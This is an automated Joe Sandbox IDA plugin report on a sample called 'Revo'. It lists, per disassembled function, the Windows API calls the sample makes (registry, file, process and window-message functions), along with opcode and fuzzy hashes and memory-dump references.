                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                              • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                                                                                                              • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                              • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                                                                                                              APIs
                                                                                                                                              • GlobalFree.KERNEL32(0AAA5760), ref: 00401C30
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                              • API String ID: 3394109436-1038607665
                                                                                                                                              • Opcode ID: 189f3b68e03b00a9a17d4d6b4d599ebfe199962089991dc822aa892377f91a7d
                                                                                                                                              • Instruction ID: 411326a6bd5adc799c7b4966fae4248b5e735fb78bdcb674ef76145c70810545
                                                                                                                                              • Opcode Fuzzy Hash: 189f3b68e03b00a9a17d4d6b4d599ebfe199962089991dc822aa892377f91a7d
                                                                                                                                              • Instruction Fuzzy Hash: 7D210572A04150ABEB20EFA5DD9599E73A8AF14314714483FFA52F36D0C67C9C908B1D
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(004125F8,00000023,00000011,00000002), ref: 004024FA
                                                                                                                                              • RegSetValueExW.KERNEL32(?,?,?,?,004125F8,00000000,00000011,00000002), ref: 0040253A
                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2655323295-0
                                                                                                                                              • Opcode ID: 939629d39815d1f7589cc98f3e393975f956bfb37faaf682d558e85f3089568e
                                                                                                                                              • Instruction ID: 68b8ec3bea957dba5bf8d8436be9304697fc99dec5cd95401ddbf8672b0cd889
                                                                                                                                              • Opcode Fuzzy Hash: 939629d39815d1f7589cc98f3e393975f956bfb37faaf682d558e85f3089568e
                                                                                                                                              • Instruction Fuzzy Hash: D2118431D00114BEEB10AFA5DE9AEAEB6B4AF44318F21443FF504F71D1D7B98E419628
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
                                                                                                                                                • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                              • lstrlenW.KERNEL32 ref: 00402364
                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 0040236F
                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1486964399-0
                                                                                                                                              • Opcode ID: 9995d0a3bc1ec283eb6257e663bd8360bd446cd403340e99a1a70e618ed02212
                                                                                                                                              • Instruction ID: 7cef90a7dc384cf9c97021313212113070c2cd8574a9969a0abcfcfa4bc01db0
                                                                                                                                              • Opcode Fuzzy Hash: 9995d0a3bc1ec283eb6257e663bd8360bd446cd403340e99a1a70e618ed02212
                                                                                                                                              • Instruction Fuzzy Hash: 34113371914314D6DB10EFF98A4A59EB6BCAF04354F20443FA405F72D1D7B8C5418B59
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00001FFF), ref: 004025F6
                                                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Enum$CloseValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 397863658-0
                                                                                                                                              • Opcode ID: ef84c1a1fe8b1ff10c5e784e766aa331886d34ef38f0b3ab15ccb812864dae0e
                                                                                                                                              • Instruction ID: ea3426adfb46afa29bf0fe74194f181189cf54c37864792d4d89e05057fb708c
                                                                                                                                              • Opcode Fuzzy Hash: ef84c1a1fe8b1ff10c5e784e766aa331886d34ef38f0b3ab15ccb812864dae0e
                                                                                                                                              • Instruction Fuzzy Hash: 4901DF71A00205BBEB149F94DE98AAFB678FF80308F10443EF001B21D0D7B84E01976D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040616D: GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                • Part of subcall function 0040616D: SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D81
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D89
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                              • Opcode ID: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                              • Instruction ID: 230036c29a26c5c6c0f0d9698206584c8b05a9663c1b6bdb31d330f7893cafd1
                                                                                                                                              • Opcode Fuzzy Hash: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                              • Instruction Fuzzy Hash: A6E065312156915AC35057759E0CA6B2A98DFC6724F15893BF892F11D0CB7C884A8A6D
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B67
                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2567322000-0
                                                                                                                                              • Opcode ID: 8ff07581d1a9b179a96ae9e6ed15c74e4a8339333c72220da53f642c9193dd0c
                                                                                                                                              • Instruction ID: 0a43b9f96fb2b6b0c204ab13ec475b47687dff995c0faea4a1be46f6685e1a01
                                                                                                                                              • Opcode Fuzzy Hash: 8ff07581d1a9b179a96ae9e6ed15c74e4a8339333c72220da53f642c9193dd0c
                                                                                                                                              • Instruction Fuzzy Hash: AFE09271600218BBDB00AB54CD01EDE7B6ADB45700F104036B601B6190D6B5AE62DA98
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000408,?,00000000,00404259), ref: 00404618
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID: x
                                                                                                                                              • API String ID: 3850602802-2363233923
                                                                                                                                              • Opcode ID: 6310f7611cc1ccfcf56369dd3329cceb302aac59914c28262eb7105b2c2a6a3a
                                                                                                                                              • Instruction ID: 02f239cb91824dfe0454512e4452fc65e03e49c46eb4308609c978d489441530
                                                                                                                                              • Opcode Fuzzy Hash: 6310f7611cc1ccfcf56369dd3329cceb302aac59914c28262eb7105b2c2a6a3a
                                                                                                                                              • Instruction Fuzzy Hash: 8EC01271684200ABCA005B81EE00F177B20B7A5B02F20C87AF380200B096B6A461DB1E
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: a5b36690e1ac02c72154c1ce5afa4b759e3a614c42b0341cc97078f1712af449
                                                                                                                                              • Instruction ID: 1ca1e87bffa477aecce4b8809d13608721b46e5c52e0656af2305a29f618206d
                                                                                                                                              • Opcode Fuzzy Hash: a5b36690e1ac02c72154c1ce5afa4b759e3a614c42b0341cc97078f1712af449
                                                                                                                                              • Instruction Fuzzy Hash: E9317F30504219BBDB12DF55EE85A9E3FA8EB00359F10443BF905FA190D2788A509BA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 0040602A
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                • Part of subcall function 00405BF6: CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,004C5000,?,00000000,000000F0), ref: 00401672
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                              • Opcode ID: 95617658206366d970ee8daf205e3d31f177179551792a2a17772dbb13571d5c
                                                                                                                                              • Instruction ID: 984bc8847ab7730807188d0ae4260eaffd58af59862b83f9ec54611d8a9cde38
                                                                                                                                              • Opcode Fuzzy Hash: 95617658206366d970ee8daf205e3d31f177179551792a2a17772dbb13571d5c
                                                                                                                                              • Instruction Fuzzy Hash: 0B11C431504514EBDF20AFA5CD4169F36A0EF14368B29493FF942B22F1D63E8981DA5E
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                              • Opcode ID: 1c769ba05c80f99646182a67dd2a9d7b609c2e0eeef89cc1e8ace76a876f498b
                                                                                                                                              • Instruction ID: 1ca5a891072309ee4d57d6c386aa99eedf8583e79045272cabd10b8210a2a1fd
                                                                                                                                              • Opcode Fuzzy Hash: 1c769ba05c80f99646182a67dd2a9d7b609c2e0eeef89cc1e8ace76a876f498b
                                                                                                                                              • Instruction Fuzzy Hash: 3311C171904206EADF15DFA0DA585AE7774FF04348F20443FE802B62D0D3B84A41DB5D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405CC8: ShellExecuteExW.SHELL32(?), ref: 00405CD7
                                                                                                                                                • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 165873841-2766056989
                                                                                                                                              • Opcode ID: e742f24370eeb6c79a6e3be1c19ad95986f761f1fedb39cce3e5cc15d6c6f8bb
                                                                                                                                              • Instruction ID: fada87d5783261b67c1888f8bede04a63cf771d19a625931ff974fd18e721819
                                                                                                                                              • Opcode Fuzzy Hash: e742f24370eeb6c79a6e3be1c19ad95986f761f1fedb39cce3e5cc15d6c6f8bb
                                                                                                                                              • Instruction Fuzzy Hash: E0112B71E142198ADB10EFB9CA4AB8DB7F0AF04308F20457FE545F72D2DBB889449B18
                                                                                                                                              APIs
                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                              • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                              • Instruction ID: 79785e1055596f35c81cc11ac1c08ebc052ec65b95c8641ce566291046e0593e
                                                                                                                                              • Opcode Fuzzy Hash: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                              • Instruction Fuzzy Hash: C10144316202109BEB091B799D04B2B3398E750754F20427FF841F32F0E6B8CC028B4E
                                                                                                                                              APIs
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040580A
                                                                                                                                                • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                              • CoUninitialize.COMBASE(00000404,00000000), ref: 00405856
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
